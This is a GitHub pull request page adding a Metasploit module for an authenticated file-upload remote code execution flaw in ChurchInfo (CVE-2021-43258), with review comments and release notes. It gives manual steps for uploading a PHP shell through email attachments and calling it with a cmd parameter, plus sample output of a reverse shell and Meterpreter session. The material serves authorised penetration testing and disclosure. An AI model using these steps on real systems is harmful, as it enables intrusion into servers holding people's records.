Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding exploit for ChurchInfo 1.2.13-1.3.0 RCE (CVE-2021-43258) #17257

Merged
merged 5 commits into from Nov 19, 2022

Conversation

m4lwhere
Copy link
Contributor

@m4lwhere m4lwhere commented Nov 13, 2022

ChurchInfo is a PHP application used to help Churches manage systems and users as an opensource project. There are various vulnerabilities in the ChurchInfo 1.3.0 software which can be exploited by an attacker, this module targets an authenticated remote code execution (RCE) vulnerability.

ChurchInfo 1.3.0 has functionality to email users from the database with attachments. When preparing the email, the attachment draft is saved in the /churchinfo/tmp_attach/ folder. Before the email is sent, the file put into the attachment can be loaded in the application. RCE exists when uploading malicious PHP as an attachment.

This vulnerability was assigned CVE-2021-43258.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Within msfconsole, use the exploits/multi/http/churchinfo_upload_exec module.
  • Set the target RHOST, APPBASE, username, and password values.
  • Tested and works properly against the application, this was reported to the ChurchInfo developers last year.
  • This exploit only affects the PHP application to perform a Remote Code Execution.

How it Works:

There is a draft email function within the application which allows users to upload attachments. Before the attachments are sent, they are stored in a directory named /tmp_attach as a direct file. This allows malicious PHP files to be uploaded and executed by the PHP engine used by the application.

Successful exploitation will appear with a similar output as below:

msf6 exploit(multi/http/churchinfo_upload_exec) > run

[*] Started reverse TCP handler on 192.168.1.240:4444
[+] Logged into application as admin
[*] Navigating to add items to cart
[+] Items in Cart: 3
[+] Uploading exploit via Email temp email attachment
[+] Exploit uploaded to /churchinfo/tmp_attach/FjuIxnXKe.php
[!] Don't forget to clean up artifacts at /churchinfo/tmp_attach/FjuIxnXKe.php
[*] Sending stage (39927 bytes) to 192.168.1.72
[*] Meterpreter session 2 opened (192.168.1.240:4444 -> 192.168.1.72:37250) at 2022-11-12 21:38:30 -0500

meterpreter >

Manual Exploitation Steps:

  1. Log into the ChurchInfo application
  2. Browse to the SelectList.php page and click the "Add to Cart" button
  3. Browse to CartView.php and click "Compose Email"
  4. Attach a PHP shell as the "attach file", place anything in the subject and message, click "Save Email"
  5. Navigate to http://127.0.0.1/churchinfo/tmp_attach/exploit.php?cmd=pwd
  6. Any PHP code is executed

Please let me know if any additional information is needed, I've read through the contribution documentation and believe that I've been able to meet all requirements.

@m4lwhere
Copy link
Contributor Author

m4lwhere commented Nov 15, 2022

This should cover all of the comments, thanks for the feedback. My most recent commit has also added a check to make sure the exploit was uploaded properly to the sever. Previously it was attempting the upload then blindly trying to execute it.

@gwillcox-r7 gwillcox-r7 self-assigned this Nov 16, 2022
@gwillcox-r7 gwillcox-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Nov 16, 2022
@github-actions
Copy link

github-actions bot commented Nov 16, 2022

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

This will enable additional information and details about the exploit as it is launched. Verbose output will appear as similar to below:

```
msf6 exploit(multi/http/churchinfo_upload_exec) > run
Copy link
Contributor

@gwillcox-r7 gwillcox-r7 Nov 16, 2022

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Output should show setting up the various options and the output of show options so that we can see what settings you are running the exploit with. Important for maintenance down the line.

Copy link
Contributor Author

@m4lwhere m4lwhere Nov 18, 2022

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Added the show options as well

Copy link
Contributor

@gwillcox-r7 gwillcox-r7 Nov 18, 2022

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@m4lwhere Don't know if this was in a commit you didn't upload but I'm not seeing this in the latest edition of this code?

modules/exploits/multi/http/churchinfo_upload_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/churchinfo_upload_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/churchinfo_upload_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/churchinfo_upload_exec.rb Outdated Show resolved Hide resolved
Copy link
Member

@jmartin-r7 jmartin-r7 left a comment

Looks great, a couple more ideas for adjustment that may make this code a bit simpler.

modules/exploits/multi/http/churchinfo_upload_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/churchinfo_upload_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/churchinfo_upload_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/churchinfo_upload_exec.rb Outdated Show resolved Hide resolved
@m4lwhere
Copy link
Contributor Author

m4lwhere commented Nov 18, 2022

Implemented all of the latest comments, thank you for all of the info! I've run rubocop and msftidy as well.

@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Nov 18, 2022

Another idea for a check method is to grab Update1_2_14To1_3_0.php. If that file exists then we are on version 1.3.0 of the target server. If we get 404's or anything other than a 200 OK then we know we are not targeting 1.3.0 of ChurchInfo.

@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Nov 18, 2022

So another thing I noticed. This bug doesn't just exist in 1.3.0. It also exists in 1.2.14 and 1.2.13 from what I can tell. Versions prior to this did not have the tmp_attach folder and do not contain the vulnerable upload code.

@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Nov 18, 2022

Added in a check method to allow the module to check if the target is vulnerable and then also used prepend Msf::Exploit::Remote::AutoCheck to make sure this is always run before exploiting to prevent exploitation if the target is not vulnerable. Users can override this if needed though.

@gwillcox-r7 gwillcox-r7 force-pushed the churchinfo-exploit branch 2 times, most recently from 543b300 to c6376fd Compare Nov 19, 2022
@gwillcox-r7 gwillcox-r7 added rn-modules release notes for new or majorly enhanced modules and removed needs-linting The module needs additional work to pass our automated linting rules labels Nov 19, 2022
@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Nov 19, 2022

Release Notes

A new module has been added for CVE-2021-43258 which exploits a flaw whereby, when emailing users in the ChurchInfo database with attachments, the uploaded file is hosted in a web accessible location under the ChurchInfo web root before the email is sent. An authenticated attacker can abuse this to gain RCE as the www-user user.

@gwillcox-r7 gwillcox-r7 changed the title Adding exploit for ChurchInfo 1.3.0 (CVE-2021-43258) Adding exploit for ChurchInfo 1.2.13-1.3.0 (CVE-2021-43258) Nov 19, 2022
@gwillcox-r7 gwillcox-r7 changed the title Adding exploit for ChurchInfo 1.2.13-1.3.0 (CVE-2021-43258) Adding exploit for ChurchInfo 1.2.13-1.3.0 RCE (CVE-2021-43258) Nov 19, 2022
@gwillcox-r7 gwillcox-r7 merged commit 8ca7550 into rapid7:master Nov 19, 2022
23 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants